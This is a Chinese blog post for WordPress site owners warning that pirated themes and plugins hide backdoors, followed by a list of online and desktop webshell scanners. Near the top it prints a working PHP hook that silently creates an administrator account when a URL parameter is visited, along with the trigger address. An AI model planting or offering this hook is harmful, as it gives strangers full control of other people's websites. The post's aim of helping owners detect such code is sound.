最常见的后门代码如下：

add_action('wp_head', 'creatbackdoor');
function creatbackdoor() {
        If ($_GET['backdoor'] == 'go') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('username', 'password');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}

将 username 和 password 分别为创建的管理员用户名和密码，所创建的后门地址为：www.yourwebsite.com/?backdoor=go，然后就可以为所欲为了！

当然，后门代码还有很多种，有一些还会经过特殊加密，比如有时候会出现类似 34d1f91fb2e514b8576fab1a75a89a6b 这种乱码，基本就可以断定你的这个主题包加了东西！所以建议小白博主，这在购买主题或者插件时，尽量不要购买有加密代码的源码，之前网上流传的号称完美破解版的 justnews_5.2.3 和 ripro_4.8 主题基本都有这种肮脏的代码，导致很多小博主的博客数据全丢！

于非科班出生的小博主，这里推荐几个网站后门查杀工具

1. 在线扫描

1) 河马在线查杀：http://n.shellpub.com

这个比较方便，支持 zip 文件压缩包直接上传扫描，当然上传的文件大小不能超过 20MB ，同时支持 asp/php/aspx/jsp/perl 等各种脚本。

2) 百度在线查杀：https://scanner.baidu.com

这个比较厉害，支持 zip、rar、tar 等各种常见压缩包，同时支持 php/jsp/asp/aspx 等各种脚本，也支持通过 API 方式进行扫描，文字咖之前一直使用这个，就是速度有点慢。。。

2) CHIP 在线查杀：https://phpchip.com

这个仅支持 PHP 且只能上传单个 PHP 文件进行扫描。

4) 在线 webshell 查杀-灭绝师太版：http://tools.bugscaner.com/killwebshell/

这个目前支持 zip 或 php 文件上传扫描，但是 zip 压缩包大小不能超过 2M。

2. 客户端扫描

1) 河马查杀

河马同时支持 Windows 和 Linux 两种客户端查杀工具，这里有个比较有意思的地方就是，河马查杀新增了一个机器学习查杀引擎，只是目前处于试验阶段，感兴趣的小伙伴可以去体验一下！

2) D 盾防火墙(强烈推荐)

文字咖最喜欢用的就是这个，可以直接在 Windows 的环境下，使用 D 盾将网站源码或疑似木马文件下载回本地扫描，非常快捷方便。

3) WebShellKiller

大名鼎鼎的深信服发布 webshell 查杀工具，也可以在 Windows 环境下直接选择需要扫描的文件夹开始扫描即可，也是非常方便好用的 webshell 查杀工具。